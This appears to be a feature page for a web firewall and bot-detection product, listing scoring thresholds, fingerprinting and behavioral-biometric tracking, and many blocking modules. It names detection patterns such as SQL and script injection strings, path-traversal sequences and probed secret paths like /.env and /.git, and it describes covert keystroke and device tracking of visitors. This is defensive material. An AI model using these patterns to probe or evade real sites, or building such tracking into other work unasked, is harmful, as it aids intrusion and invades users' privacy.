- Method Probing Detection: 4+ distinct HTTP methods (GET/POST/PUT/DELETE/PATCH/OPTIONS/HEAD) against the same path = method enumeration attack (+30pts)
- Error Rate Analysis: Three tiers - elevated (>25% 4xx β +12pts), high (>50% 4xx/5xx β +25pts), 404-dominant (>50% 404 β +35pts). Distinguishes path probing from application errors
- Parameter Fuzzing Detection: Same endpoint with 10+ unique parameter names across 20+ requests = automated parameter discovery (+30pts)
- UA Rotation Detection: >30% unique User-Agents across 10+ requests = evasion attempt via UA cycling (+25pts)
- Burst Pattern Detection: Zero requests in the prior 9-minute window followed by 20+ in the last minute = attack burst after reconnaissance silence (+30pts)
- Path Traversal Scoring: Double-dot sequences (../, ..\, %2e%2e), null bytes (\x00, %00), CRLF injection (\r, \n) in request paths scored independently in both FastBlocker and BehaviorEngine layers
- Query String Injection: Structural injection patterns in query strings - union+select, <script, onerror=, exec(, base64_decode(, javascript: - scored +50β55pts on first occurrence
- Sticky Block System: Score β₯70 triggers a 15-minute hard block written to the profile. Pre-request IsBlocked() check fires before WAF rules, DDoS engine, or upstream proxy
- Block Auto-Expiry: Block TTL auto-expires on the next request after 15 minutes. Profile demoted to challenge state rather than deleted - retains behavioral history
- Session Trust Bonus: Established sessions older than 10 minutes with score <20 receive a β15pts reduction. Prevents over-blocking legitimate power users
- New Profile Penalty: Profile younger than 10 seconds with 15+ requests scores +20pts - human-impossible volume in that window
- Domain Isolation: Profile store is per-domain. Dashboard locked to r.Host - ?domain= query parameter is completely ignored server-side, preventing cross-tenant data leakage
- IP Rate Limiter: Sliding window 30 req/10s per IP. Fires independently of behavioral scoring - instant 5-minute block regardless of headers or UA
- Health Check Bypass: Silent monitoring probes (no UA, GET /, no body) are whitelisted at FastBlocker level - load balancer checks never accumulate false-positive scores
- Learning Mode: Monitor-only mode records detections and flags profiles without blocking. Safe for baseline establishment. Toggle live via /waf-dashboard/behavior-learning endpoint
- Profile Ring Buffer: Each profile stores the last 100 requests in memory with O(1) eviction. Fixed memory footprint regardless of request volume
- Background Sweeper: Idle profiles evicted every 5 minutes after 30-minute TTL. Prevents unbounded memory growth under sustained scan traffic
- 2 Layers, 20+ Signals: Layer 1 (FastBlocker) - 7 instant signals on request 1. Layer 2 (BehaviorEngine) - 13 multi-request signals over sliding 5-minute window. Both run synchronously before upstream proxy. No external dependencies - no Redis, no database, no sidecar
π‘ How it works: Every request passes through two independent scoring layers. FastBlocker evaluates structural signals immediately - Sec-Fetch headers, Accept quality, header count, UA shape, path anomalies, and IP rate. BehaviorEngine builds a per-fingerprint profile and scores velocity, timing regularity, path entropy, error rates, static asset ratio, burst patterns, and more over a sliding 5-minute window. A fingerprint reaching score β₯70 is sticky-blocked for 15 minutes. JA3 hash from the TLS ClientHello is the primary profile key - IP rotation, VPN hops, and proxy chains don't reset the profile if the TLS fingerprint is consistent. The entire system runs in-process with no external dependencies.
π No-IP Device Behavioral Protection
Advanced device fingerprinting that tracks malicious actors across IP changes, VPNs, proxies, and Tor. Uses behavioral biometrics (keystrokes, mouse movements, scrolling patterns), canvas/webGL fingerprints, TLS JA3 hashing, and velocity analysis to identify and block automated threats even when they rotate IP addresses
Key Benefits
- IP-Agnostic Fingerprinting: Generates persistent device IDs using browser fingerprints, canvas/WebGL hashes, audio context, fonts, screen resolution, hardware concurrency, and OS detection - tracks devices even when they change IP addresses via VPN, proxy, or Tor
- Browser & OS Detection: Identifies browser (Chrome, Firefox, Safari, Edge, Opera, Brave), browser engine (Blink, WebKit, Gecko), OS (Windows, macOS, iOS, Android, Linux), OS version, and architecture (x86_64, ARM64) - detects spoofing attempts
- Canvas Fingerprinting: Generates unique canvas hashes from rendered text, shapes, and colors - persistent across sessions and IP changes. Detects canvas hash changes within consistency window as indication of emulation or spoofing
- WebGL Fingerprinting: Extracts WebGL renderer and vendor information (Mali, Adreno, Apple GPU, NVIDIA, Intel) via WEBGL_debug_renderer_info extension - detects emulated GPU environments
- Audio Context Fingerprinting: Analyzes oscillator waveform rendering differences across browsers and devices - each device produces unique audio hashes based on hardware
- Font Fingerprinting: Detects installed system fonts via flash of invisible text (FOIT) measurement - 100+ font families tested for device uniqueness
- Hardware Fingerprinting: Collects screen resolution, color depth, pixel ratio, hardware concurrency (CPU cores), device memory, and max touch points - creates comprehensive device signature
- Headless Browser Detection: Scores headless probability (0.0-1.0) based on User-Agent patterns (HeadlessChrome, PhantomJS, Puppeteer, Playwright) and behavioral anomalies - blocks scores above 0.5 with 0.9 confidence
- Automation Detection: Identifies automation tools (Selenium, Puppeteer, Playwright, Python-Requests, curl, wget, Go-http, Postman, Insomnia) with weighted scoring - blocks with 0.7+ score
- Behavioral Biometrics - Keystroke Dynamics: Tracks key press timing (inter-key latency) and key hold duration - calculates average typing speed, rhythm hash, and standard deviation. Standard deviation <2ms indicates robotic typing (+20% risk)
- Behavioral Biometrics - Mouse Movements: Records mouse coordinates, calculates speed, acceleration, and curvature. Sustained near-zero curvature indicates robotic movement +15% risk. Generates mouse movement hash from last 20 points
- Behavioral Biometrics - Click Patterns: Tracks click coordinates and target elements, calculates average click position, detects exact click repetition (>80% same pixel = robotic +15% risk)
- Behavioral Biometrics - Scroll Patterns: Records scroll position, speed, and direction - calculates average scroll speed and dominant direction (up/down/both)
- Request Velocity Tracking: Rolling windows (1-minute, 5-minute, 1-hour) track request density - thresholds: 300 req/min, 1400 req/5min, 30 req/sec burst detection triggers +35% risk score
- IP Hopping Detection: Tracks unique IPs per device in 1-hour window. 3+ unique IPs flags IP hopping +30% risk - blocks VPN/proxy rotation attacks
- Geo-Impossible Travel Detection: Calculates speed between geographic locations (requires GeoIP). Speed >900 km/h triggers geo-impossible travel +35% risk - detects VPN hopping across continents
- Canvas Consistency Monitoring: Tracks canvas hash changes within 15-minute window on same User-Agent. Hash changes indicate emulation/anti-fingerprinting +25% risk
- TLS JA3 Fingerprinting: Cross-references JA3 hash from CloudFlare or proxy headers - tracks TLS stack even when IP changes. Self-signed certificates bypass JA3 checks to avoid false positives
- Login Brute Force Detection: 5-minute rolling window tracks failed login attempts - 5+ failures in 5m = +30% risk, 15+ in 1h = +25% risk. Persistent threat memory stores total failed logins across sessions
- Sensitive Path Probing: Detects enumeration of /wp-admin, /admin, /phpmyadmin, /.env, /.git, /backup, /config - +15% risk per probe
- Path Scanning Detection: 50+ unique paths per device flags directory brute-forcing +20% risk
- Rapid Request Detection: Inter-request intervals <50ms flag automation +10% risk
- Header Completeness Analysis: Detects missing Accept, Accept-Language, Accept-Encoding headers - common in tools (+15% risk each). Chrome missing Connection header is normal (HTTP/2)
- User-Agent Structure Validation: Validates Mozilla signature, parentheses structure, version numbers. Empty UA +40pts, missing Mozilla +20pts, no parentheses +10pts
- Accept Header Analysis: */* without quality values flags generic accept +15% risk for non-browser clients
- Cookie Handling Detection: Missing cookies +10% risk for authenticated paths (tools often don't handle cookies)
- Referer Validation: Missing referer on non-root paths +10% risk
- Persistent Threat Memory: Tracks total blocks, failed logins, attack types, and suspicion score across sessions - survives block expiry, increases risk weighting by 30% for repeat offenders
- Risk Score Calculation: Weighted aggregation (IP hopping 0.30, geo travel 0.35, burst 0.35, velocity 0.15-0.20, brute force 0.25-0.30, headless 0.35, automation 0.25, robotic typing 0.20, canvas inconsistency 0.25). Threshold 0.70 = malicious, 0.40-0.70 triggers challenge
- Confidence Scoring: Based on data points (requests, keystrokes, mouse moves) - max 1.0 at 500+ points, prevents false positives on limited data
- Auto-Blocking: Risk β₯0.70 triggers 15-minute block (configurable), threat memory records each block and elevates suspicion score
- Challenge System: Risk 0.40-0.70 issues proof-of-work CAPTCHA challenges. Successful challenges reduce risk by -0.20, failed challenges +0.10 risk
- Automatic Session Cleanup: 1-hour background sweeper removes fingerprints idle >30 days, auto-unblocks devices after BlockDuration
- Memory Efficient: Ring buffers for request history (last 200 requests), keystroke/mouse data (last 1000 points), IP history (last 100 entries) - prevents unbounded memory growth
- API Endpoints: /api/behavioral/device (fingerprint), /api/behavioral/keystroke (typing patterns), /api/behavioral/mouse (mouse movements), /api/behavioral/click (click patterns), /api/behavioral/scroll (scroll behavior), /api/behavioral/challenge (CAPTCHA), /debug/noip-stats (statistics)
- Client-Side Collector: 8KB JavaScript automatically injects into HTML pages - collects canvas hash, WebGL, audio fingerprint, keystrokes, mouse movements, clicks, scrolls. sendBeacon API ensures delivery without blocking navigation
- Zero External Dependencies: No Redis, No database - all fingerprint data stored in memory with automatic cleanup. 10,000 fingerprints consume ~200MB RAM
- Performance Impact: <50Β΅s per request for fingerprint lookup, <500KB memory per active fingerprint, FIFO eviction prevents leaks
π‘ How it works: The No-IP Behavioral Protection system generates a persistent device ID using browser fingerprints that survive IP changes. When a request arrives, the system extracts device identity from User-Agent, OS, browser engine, and hardware signals. Canvas/WebGL/Audio fingerprints create a hardware-level signature. The client-side JavaScript collects behavioral biometrics (keystroke timing, mouse movement curves, click patterns, scroll velocity) and sends them via sendBeacon API. The server tracks velocity in rolling windows (1m/5m/1h), detects IP hopping via history analysis, and calculates geographic speed using GeoIP (if available). Each violation adds weighted risk points - reaching 0.70 triggers a 15-minute IP-agnostic block based on device ID. The threat memory persists across block expiry, so repeat offenders face stricter scrutiny. All fingerprint data stays in memory with automatic TTL-based cleanup (30 days idle). No external dependencies required - the entire system runs in-process with sub-50Β΅s overhead.
π Detection Metrics:
- IP-hopping detection: 3+ unique IPs/1h = +30% risk
- Geo-impossible travel: Speed >900 km/h = +35% risk
- Login brute force: 5 failures/5m = +30% risk
- Canvas inconsistency: Hash changes within 15m = +25% risk
- Headless detection: 0.5+ score = +35% risk
- Automation detection: 0.7+ score = +25% risk
- Robotic typing: Std Dev <2ms = +20% risk
- Burst attack: 30+ req/sec = +35% risk
- High velocity: 300+ req/min = +20% risk
- Path scanning: 50+ unique paths = +20% risk
π Detected Threat Types:
- VPN/Proxy Rotation: IP hopping detection tracks IP changes regardless of anonymization service
- Tor Network: Geo-impossible travel flags rapid international movement
- Headless Browsers: HeadlessChrome, PhantomJS, Puppeteer, Playwright detection via UA + behavioral analysis
- Automation Tools: Selenium WebDriver, Python-Requests, curl, wget, Go-http, Postman, Insomnia
- Credential Stuffing: Login velocity tracking (5m/1h windows) with persistent failure memory
- Brute Force: Combined IP-hopping + login velocity + path scanning detection
- DDoS Botnets: Velocity thresholds (300 req/min, 30 req/sec) with burst detection
- Scrapers/Crawlers: Missing browser headers, no cookies, robotic mouse movements, exact click repetition
- Directory Brute-Forcing: Path diversity detection (50+ unique paths) + sensitive path probing
- Anti-Fingerprinting Tools: Canvas hash drifting within consistency window flags emulation
AI-Powered Protection
π Fingerprint Blocking
Blocks requests based on malicious browser/device fingerprinting patterns
Blocks requests based on malicious browser/device fingerprinting patterns.
- Detects abnormal browser fingerprints
- Identifies spoofed user agents
- Blocks headless browser signatures
- Prevents fingerprint-based evasion techniques
π¦ Payload Blocking
Detects and blocks malicious payloads in requests
Detects and blocks malicious payloads in requests using AI-powered analysis.
- Real-time payload inspection
- ML-based threat classification
- Zero-day exploit detection
- Multi-vector payload analysis
π Traffic Anomaly Blocking
Identifies and blocks abnormal traffic patterns
Identifies and blocks abnormal traffic patterns using behavioral analysis.
- Detects traffic spikes and anomalies
- Identifies DDoS attack patterns
- Behavioral baselining
- Automated threat response
π« IP Reputation Blocking
Blocks requests from known malicious IP addresses
Blocks requests from known malicious IP addresses using real-time threat intelligence.
- Integration with blocklist.de
- Real-time IP reputation checks
- Dynamic blacklist updates
- Custom IP blacklisting
πΈοΈ JavaScript Behavior Blocking
Analyzes and blocks suspicious JavaScript behavior
Analyzes and blocks suspicious JavaScript behavior in real-time.
- Detects malicious JS execution
- Identifies cryptojacking attempts
- Blocks DOM manipulation attacks
- Prevents JS-based data exfiltration
πͺ Cookie Validation Blocking
Validates and blocks requests with tampered cookies
Validates and blocks requests with tampered cookies using AI-based scoring.
- Detects cookie tampering attempts
- Validates session integrity
- Blocks session hijacking
- Prevents replay attacks
π± Device Identity Blocking
Blocks requests from untrusted or spoofed devices
Blocks requests from untrusted or spoofed devices using device fingerprinting.
- Device fingerprint validation
- Detects emulator environments
- Blocks device spoofing
- Cross-session device tracking
π€ Automation Tool Blocking
Detects and blocks automated bot/script traffic
Detects and blocks automated bot/script traffic with high accuracy.
- Detects Selenium, Puppeteer, Playwright
- Identifies headless browsers
- Blocks scraping tools
- Prevents automated attacks
βοΈ Cloud Service Blocking
Blocks requests from known cloud hosting providers (if malicious)
Blocks requests from known cloud hosting providers when malicious patterns are detected.
- Identifies cloud data center traffic
- Blocks malicious cloud-based attacks
- AWS/Azure/GCP detection
- Cloud IP range filtering
π DNS Rebinding Blocking
Prevents DNS rebinding attacks
Prevents DNS rebinding attacks through intelligent detection.
- Detects DNS rebinding patterns
- Validates DNS responses
- Blocks internal IP exposure
- Prevents SSRF via DNS rebinding
π Credential Stuffing Blocking
Detects and blocks credential stuffing attempts
Detects and blocks credential stuffing attempts using behavioral analysis.
- Identifies rapid login attempts
- Detects password spraying
- Blocks breached credential use
- Rate limiting for auth endpoints
π·οΈ Crawler Detection Blocking
Identifies and blocks malicious web crawlers
Identifies and blocks malicious web crawlers while allowing legitimate search engines.
- Differentiates good/bad crawlers
- Validates search engine bots
- Blocks content scrapers
- Prevents competitive data mining
π API Abuse Blocking
Prevents API abuse and excessive API calls
Prevents API abuse and excessive API calls using ML-based detection.
- Detects API scraping
- Identifies abnormal API patterns
- Prevents business logic abuse
- Intelligent rate limiting
π¨ Header Injection Blocking
Blocks HTTP header injection attacks
Blocks HTTP header injection attacks through comprehensive validation.
- Detects CRLF injection
- Prevents response splitting
- Blocks host header attacks
- Validates all HTTP headers
π TLS Fingerprint Blocking
Blocks requests based on malicious TLS fingerprint patterns (JA3)
Blocks requests based on malicious TLS fingerprint patterns (JA3/JA3S).
- JA3 fingerprint analysis
- Detects malicious TLS clients
- Identifies bot TLS patterns
- Blocks known attack tools
π‘οΈ SSL MITM Blocking
Detects and blocks SSL Man-in-the-Middle attacks
Detects and blocks SSL Man-in-the-Middle attacks through advanced analysis.
- Detects SSL stripping
- Identifies certificate anomalies
- Blocks MITM proxies
- Validates TLS handshakes
βͺοΈ Open Redirect Blocking
Prevents open redirect vulnerabilities
Prevents open redirect vulnerabilities through intelligent URL validation.
- Detects malicious redirects
- Validates redirect URLs
- Blocks phishing attempts
- Prevents open redirect exploitation
π Fake Bot Blocking
Blocks fake/search engine bot impersonation
Blocks fake/search engine bot impersonation through rigorous validation.
- Validates search engine IPs
- Detects bot impersonation
- Reverse DNS verification
- Blocks fake crawlers
β‘ AI Rate Limit Blocking
AI-based intelligent rate limiting
AI-based intelligent rate limiting that adapts to traffic patterns.
- Dynamic rate limiting
- Behavior-based thresholds
- Adaptive response
- Prevents DDoS and abuse
π JA3 Check
Validates JA3 TLS fingerprint against known malicious patterns
Validates JA3 TLS fingerprint against known malicious patterns.
- JA3 blacklist matching
- Malicious client detection
- Attack tool identification
- Custom JA3 rules
π₯οΈ VM/Debug Detection Blocking
Blocks requests from virtual machines/debugging environments
Blocks requests from virtual machines and debugging environments.
- Detects VM environments
- Identifies debugger presence
- Blocks sandbox evasion
- Prevents analysis evasion
π¨ Canvas Fingerprint Blocking
Blocks based on malicious canvas fingerprinting
Blocks requests based on malicious canvas fingerprinting patterns.
- Detects canvas fingerprinting
- Blocks tracking attempts
- Identifies automation tools
- Prevents browser profiling
π Path Traversal Blocking
Prevents directory/path traversal attacks
Prevents directory/path traversal attacks through comprehensive filtering.
- Blocks ../ patterns
- Prevents directory listing
- Protects sensitive files
- URL encoding detection
πΎ SQL Injection Blocking
Detects and blocks SQL injection attempts
Detects and blocks SQL injection attempts using advanced pattern matching.
- Blocks UNION-based attacks
- Detects time-based injection
- Prevents error-based disclosure
- Blocks stacked queries
β οΈ XSS Detection Blocking
Prevents Cross-Site Scripting (XSS) attacks
Prevents Cross-Site Scripting (XSS) attacks through comprehensive filtering.
- Blocks reflected XSS
- Prevents stored XSS
- Detects DOM-based XSS
- Filters malicious scripts
β¨οΈ Command Injection Blocking
Blocks OS command injection attempts
Blocks OS command injection attempts through rigorous input validation.
- Detects shell metacharacters
- Blocks command chaining
- Prevents RCE attempts
- Filters dangerous commands
π XXE Detection Blocking
Prevents XML External Entity attacks
Prevents XML External Entity attacks through XML parsing protection.
- Blocks external entity expansion
- Prevents XXE-based SSRF
- Disables dangerous DTDs
- Filters malicious XML
π LDAP Injection Blocking
Blocks LDAP injection attempts
Blocks LDAP injection attempts through comprehensive input filtering.
- Detects LDAP metacharacters
- Blocks filter manipulation
- Prevents LDAP query tampering
- Input sanitization
π NoSQL Injection Blocking
Prevents NoSQL database injection attacks
Prevents NoSQL database injection attacks through specialized filtering.
- Detects MongoDB operators
- Blocks JavaScript injection
- Prefers parameter pollution
- Validates JSON inputs
π SSTI Detection Blocking
Blocks Server-Side Template Injection attacks
Blocks Server-Side Template Injection attacks across multiple template engines.
- Detects template syntax
- Blocks RCE via templates
- Prevents information disclosure
- Engine-specific detection
π CSRF Check Blocking
Prevents Cross-Site Request Forgery attacks
Prevents Cross-Site Request Forgery attacks through token validation.
- CSRF token validation
- Origin header checking
- Same-site verification
- Anti-automation measures
π±οΈ Clickjacking Blocking
Prevents clickjacking/frame hijacking attempts
Prevents clickjacking and frame hijacking attempts.
- X-Frame-Options enforcement
- CSP frame-ancestors directive
- Frame-busting detection
- UI redress attack prevention
π Vulnerability Scanner Blocking
Blocks automated vulnerability scanners
Blocks automated vulnerability scanners through advanced detection.
- Detects scanner fingerprints
- Blocks common scanning tools
- Identifies reconnaissance
- Prevents vulnerability probing
π» Terminal Access Blocking
Prevents unauthorized terminal/console access
Prevents unauthorized terminal and console access attempts.
- Blocks reverse shells
- Detects command injection
- Prevents RCE attempts
- Filters shell commands
π‘οΈ jQuery Guard Blocking
Protects against jQuery-based attacks
Protects against jQuery-based attacks and vulnerabilities.
- Blocks jQuery XSS vectors
- Prevents jQuery DOM manipulation
- Detects jQuery exploitation
- CVE-specific protections
π‘ Scan Technique Blocking
Blocks advanced scanning techniques
Blocks advanced scanning techniques used by professional attackers.
- Detects slow scans
- Blocks distributed scanning
- Identifies evasion techniques
- Prevents fingerprinting
π Script Detector Blocking
Detects and blocks malicious script execution attempts
Comprehensive script analysis and malicious execution detection
- Browser Imitation Detection - Detects spoofed user agents and header inconsistencies
- Request Fingerprinting - Analyzes header patterns and capitalization
- Timing Humanity Analysis - Statistical analysis of request timing patterns
- Resource Loading Detection - Analyzes resource loading behavior
- Session Behavior Analysis - Tracks session patterns and navigation flows
- Payload Consistency - Detects automated payload generation
- Error Handling Analysis - Identifies automated error recovery patterns
- Basic Headless Detection - Traditional headless browser detection
- Missing Browser Headers - Identifies missing standard browser headers
- Automation Indicators - Detects Selenium, Puppeteer, Playwright, etc.
- Advanced Headless Detection - 25+ headless variants detection
- Playwright/Selenium Fingerprinting - Version-specific detection
- Puppeteer/CDP Detection - Chrome DevTools Protocol analysis
- Curl/Wget Detection - Command-line tool fingerprinting
- Python Requests Detection - Python HTTP library detection
- VM Environment Detection - Virtual machine/container detection
- Automation Timing Patterns - Advanced statistical timing analysis
- Missing JS Evidence - Detects lack of JavaScript execution
- Cookie Handling Anomalies - Identifies automated cookie management
- DevTools Protocol - Detects CDP usage
- Advanced Headless - Cloud headless services detection
- ML-Based Detection - Machine learning classification (optional)
- Human Biometric - Mouse/touch/keystroke pattern analysis
- Hardware Fingerprinting - GPU, CPU, canvas fingerprinting
- Advanced Evasion - Detects anti-detection techniques
π€ Behavior Detector Blocking
Analyzes user behavior patterns to identify anomalies
Advanced behavioral analysis for human vs automated detection
- Browser Imitation Detection - Detects spoofed user agents and header inconsistencies
- Request Fingerprinting - Analyzes header patterns and capitalization
- Timing Humanity Analysis - Statistical analysis of request timing patterns
- Resource Loading Detection - Analyzes resource loading behavior
- Session Behavior Analysis - Tracks session patterns and navigation flows
- Payload Consistency - Detects automated payload generation
- Error Handling Analysis - Identifies automated error recovery patterns
- Basic Headless Detection - Traditional headless browser detection
- Missing Browser Headers - Identifies missing standard browser headers
- Automation Indicators - Detects Selenium, Puppeteer, Playwright, etc.
- Advanced Headless Detection - 25+ headless variants detection
- Playwright/Selenium Fingerprinting - Version-specific detection
- Puppeteer/CDP Detection - Chrome DevTools Protocol analysis
- Curl/Wget Detection - Command-line tool fingerprinting
- Python Requests Detection - Python HTTP library detection
- VM Environment Detection - Virtual machine/container detection
- Automation Timing Patterns - Advanced statistical timing analysis
- Missing JS Evidence - Detects lack of JavaScript execution
- Cookie Handling Anomalies - Identifies automated cookie management
- DevTools Protocol - Detects CDP usage
- Advanced Headless - Cloud headless services detection
- ML-Based Detection - Machine learning classification (optional)
- Human Biometric - Mouse/touch/keystroke pattern analysis
- Hardware Fingerprinting - GPU, CPU, canvas fingerprinting
- Advanced Evasion - Detects anti-detection techniques
β οΈ C2 Detector Blocking
Identifies Command & Control communication patterns
Advanced Command & Control communication detection and blocking
- Browser Imitation Detection - Detects spoofed user agents and header inconsistencies
- Request Fingerprinting - Analyzes header patterns and capitalization
- Timing Humanity Analysis - Statistical analysis of request timing patterns
- Resource Loading Detection - Analyzes resource loading behavior
- Session Behavior Analysis - Tracks session patterns and navigation flows
- Payload Consistency - Detects automated payload generation
- Error Handling Analysis - Identifies automated error recovery patterns
- Basic Headless Detection - Traditional headless browser detection
- Missing Browser Headers - Identifies missing standard browser headers
- Automation Indicators - Detects Selenium, Puppeteer, Playwright, etc.
- Advanced Headless Detection - 25+ headless variants detection
- Playwright/Selenium Fingerprinting - Version-specific detection
- Puppeteer/CDP Detection - Chrome DevTools Protocol analysis
- Curl/Wget Detection - Command-line tool fingerprinting
- Python Requests Detection - Python HTTP library detection
- VM Environment Detection - Virtual machine/container detection
- Automation Timing Patterns - Advanced statistical timing analysis
- Missing JS Evidence - Detects lack of JavaScript execution
- Cookie Handling Anomalies - Identifies automated cookie management
- DevTools Protocol - Detects CDP usage
- Advanced Headless - Cloud headless services detection
- ML-Based Detection - Machine learning classification (optional)
- Human Biometric - Mouse/touch/keystroke pattern analysis
- Hardware Fingerprinting - GPU, CPU, canvas fingerprinting
- Advanced Evasion - Detects anti-detection techniques
βοΈ Attack Detector Blocking
Multi-vector attack detection and prevention
Comprehensive multi-vector attack detection system
- Browser Imitation Detection - Detects spoofed user agents and header inconsistencies
- Request Fingerprinting - Analyzes header patterns and capitalization
- Timing Humanity Analysis - Statistical analysis of request timing patterns
- Resource Loading Detection - Analyzes resource loading behavior
- Session Behavior Analysis - Tracks session patterns and navigation flows
- Payload Consistency - Detects automated payload generation
- Error Handling Analysis - Identifies automated error recovery patterns
- Basic Headless Detection - Traditional headless browser detection
- Missing Browser Headers - Identifies missing standard browser headers
- Automation Indicators - Detects Selenium, Puppeteer, Playwright, etc.
- Advanced Headless Detection - 25+ headless variants detection
- Playwright/Selenium Fingerprinting - Version-specific detection
- Puppeteer/CDP Detection - Chrome DevTools Protocol analysis
- Curl/Wget Detection - Command-line tool fingerprinting
- Python Requests Detection - Python HTTP library detection
- VM Environment Detection - Virtual machine/container detection
- Automation Timing Patterns - Advanced statistical timing analysis
- Missing JS Evidence - Detects lack of JavaScript execution
- Cookie Handling Anomalies - Identifies automated cookie management
- DevTools Protocol - Detects CDP usage
- Advanced Headless - Cloud headless services detection
- ML-Based Detection - Machine learning classification (optional)
- Human Biometric - Mouse/touch/keystroke pattern analysis
- Hardware Fingerprinting - GPU, CPU, canvas fingerprinting
- Advanced Evasion - Detects anti-detection techniques
π€ AI Attack Detector Blocking
Advanced AI-powered attack detection for zero-day threats
Next-generation AI-powered threat detection for zero-day and emerging attacks
- Browser Imitation Detection - Detects spoofed user agents and header inconsistencies
- Request Fingerprinting - Analyzes header patterns and capitalization
- Timing Humanity Analysis - Statistical analysis of request timing patterns
- Resource Loading Detection - Analyzes resource loading behavior
- Session Behavior Analysis - Tracks session patterns and navigation flows
- Payload Consistency - Detects automated payload generation
- Error Handling Analysis - Identifies automated error recovery patterns
- Basic Headless Detection - Traditional headless browser detection
- Missing Browser Headers - Identifies missing standard browser headers
- Automation Indicators - Detects Selenium, Puppeteer, Playwright, etc.
- Advanced Headless Detection - 25+ headless variants detection
- Playwright/Selenium Fingerprinting - Version-specific detection
- Puppeteer/CDP Detection - Chrome DevTools Protocol analysis
- Curl/Wget Detection - Command-line tool fingerprinting
- Python Requests Detection - Python HTTP library detection
- VM Environment Detection - Virtual machine/container detection
- Automation Timing Patterns - Advanced statistical timing analysis
- Missing JS Evidence - Detects lack of JavaScript execution
- Cookie Handling Anomalies - Identifies automated cookie management
- DevTools Protocol - Detects CDP usage
- Advanced Headless - Cloud headless services detection
- ML-Based Detection - Machine learning classification (optional)
- Human Biometric - Mouse/touch/keystroke pattern analysis
- Hardware Fingerprinting - GPU, CPU, canvas fingerprinting
- Advanced Evasion - Detects anti-detection techniques
Core Security Features
π‘οΈ Advanced DDoS Protection
Multi-layer protection against volumetric, protocol, and application-layer DDoS attacks
Advanced multi-layer DDoS mitigation designed to protect infrastructure, APIs, and applications from distributed denial-of-service attacks.
π Volumetric Attacks
- HTTP / HTTPS Flood
- SYN Flood
- UDP / ICMP Flood
- Amplification Attacks (DNS, NTP, Memcached, SSDP)
- Distributed HTTP Flood
- Layer-7 Bandwidth Exhaustion
β Protocol Attacks
- Slowloris
- Slow-Read Attack
- RUDY (Slow POST)
- Ping-of-Death
- TCP Null / FIN / Xmas Flag Attacks
- LAND Attack
- IP Fragmentation Flood
- Malformed HTTP Requests
- Oversized Headers
- Keep-Alive Connection Abuse
π Application Layer (L7)
- HTTP Flood (Layer-7)
- Cache-Busting Attacks
- Path Focusing Attacks
- Hash-Collision DoS
- Recursive / Deep GET Attacks
- Query-String Flood
- Form Parameter Flood
- Resource Exhaustion
- Regex DoS (ReDoS Probes)
π API & Modern Application Attacks
- GraphQL Depth Bomb
- GraphQL Introspection Probing
- GraphQL Batch Abuse
- REST Endpoint Hammering
- API Key Brute-Force
- WebSocket Flood
- JSON Bomb / Nested Object Payload
πΌ Business Logic Abuse
- Login Flood
- Credential Stuffing
- Upload Size Abuse
- Upload Rate Abuse
- OTP / Verification Code Hammering
- Coupon / Voucher Abuse
- Account Enumeration
- Password Spraying
- Checkout Flood
π§ Behavioral & Threat Intelligence
- Error Flood Detection
- Missing / Spoofed User-Agent
- Known Bad Bot Detection
- Headless Browser Fingerprinting
- Scanner / Probe Signature Detection
- TOR Exit Node Indicator
- Session Abuse Detection
- Path Enumeration Detection
- Reputation-Based Risk Scoring
- Geo-Location Anomaly Detection
π SQL Injection Protection (A1)
Protects against SQL injection attacks (OWASP Top 10 A1)
Comprehensive protection against SQL injection attacks, addressing OWASP Top 10 A1.
- Advanced SQLi detection
- Prevents data exfiltration
- Blocks injection attempts
- Database-agnostic protection
π Sensitive Data Encryption (A3)
Ensures sensitive data is properly encrypted (OWASP Top 10 A3)
Ensures sensitive data is properly encrypted and protected.
- Automatic encryption enforcement
- Prevents data leakage
- PCI-DSS compliance support
- GDPR data protection
π XML External Entities Blocked (A4)
Prevents XXE attacks (OWASP Top 10 A4)
Prevents XML External Entity attacks through comprehensive XML filtering.
- Blocks external entity expansion
- Prevents XXE-based SSRF
- Disables dangerous DTDs
- XML parsing protection
π Path Traversal Protection (A5)
Blocks directory/path traversal attempts (OWASP Top 10 A5)
Blocks directory/path traversal attempts, addressing OWASP Top 10 A5.
- Blocks directory traversal
- Prevents file access
- Protects sensitive paths
- URL normalization
βοΈ Misconfiguration Scan (A6)
Detects and blocks security misconfigurations (OWASP Top 10 A6)
Detects and blocks security misconfigurations, addressing OWASP Top 10 A6.
- Scans for misconfigurations
- Blocks exposed admin panels
- Prevents default credential use
- Security header validation
β οΈ XSS Protection (A7)
Prevents Cross-Site Scripting attacks (OWASP Top 10 A7)
Prevents Cross-Site Scripting attacks, addressing OWASP Top 10 A7.
- Reflected XSS prevention
- Stored XSS blocking
- DOM-based XSS protection
- Content Security Policy
π¦ Insecure Deserialization Block (A8)
Blocks insecure deserialization attempts (OWASP Top 10 A8)
Blocks insecure deserialization attempts, addressing OWASP Top 10 A8.
- Detects malicious serialized objects
- Blocks RCE via deserialization
- Prevents object injection
- Java/PHP/Python protection
π Logging and Monitoring (A10)
Ensures proper logging and monitoring (OWASP Top 10 A10)
Ensures proper logging and monitoring, addressing OWASP Top 10 A10.
- Comprehensive request logging
- Real-time threat monitoring
- ClickHouse analytics
- Alert generation
π Slowloris Protection
Protects against Slowloris DDoS attacks
Protects against Slowloris DDoS attacks through connection management.
- Detects slow connections
- Manages partial requests
- Timeout enforcement
- Connection limiting
π Header Length Limit
Limits maximum HTTP header length to 3019 bytes
Limits maximum HTTP header length to 3019 bytes to prevent buffer overflow attacks.
- Enforces header size limits
- Prevents header overflow
- Blocks oversized requests
- Memory protection
π Flooding Attacks Protection
Protects against request flooding attacks
Protects against request flooding attacks through intelligent rate control.
- Detects request bursts
- Blocks flood attacks
- Adaptive rate limiting
- DDoS mitigation
π Header Scan Protection
Scans and validates HTTP headers for attacks
Scans and validates HTTP headers for potential attacks and anomalies.
- Header injection detection
- Malformed header blocking
- Security header validation
- Custom header rules
πͺ Cookie Tampering Protection
Prevents cookie modification/tampering attempts
Prevents cookie modification and tampering attempts through validation.
- Cookie integrity checking
- Encryption enforcement
- Session fixation prevention
- Tamper detection
π Session Cookie Validation
Validates session cookies for security
Validates session cookies to ensure session integrity and security.
- Session ID validation
- Expiration checking
- Signature verification
- Replay attack prevention
π Client Behavior Analysis
Analyzes client behavior patterns for anomalies
Analyzes client behavior patterns to detect anomalies and threats.
- Behavioral baselining
- Anomaly detection
- Session analysis
- Pattern recognition
π« Block Malformed Headers
Blocks requests with malformed/invalid HTTP headers
Blocks requests with malformed or invalid HTTP headers.
- Header syntax validation
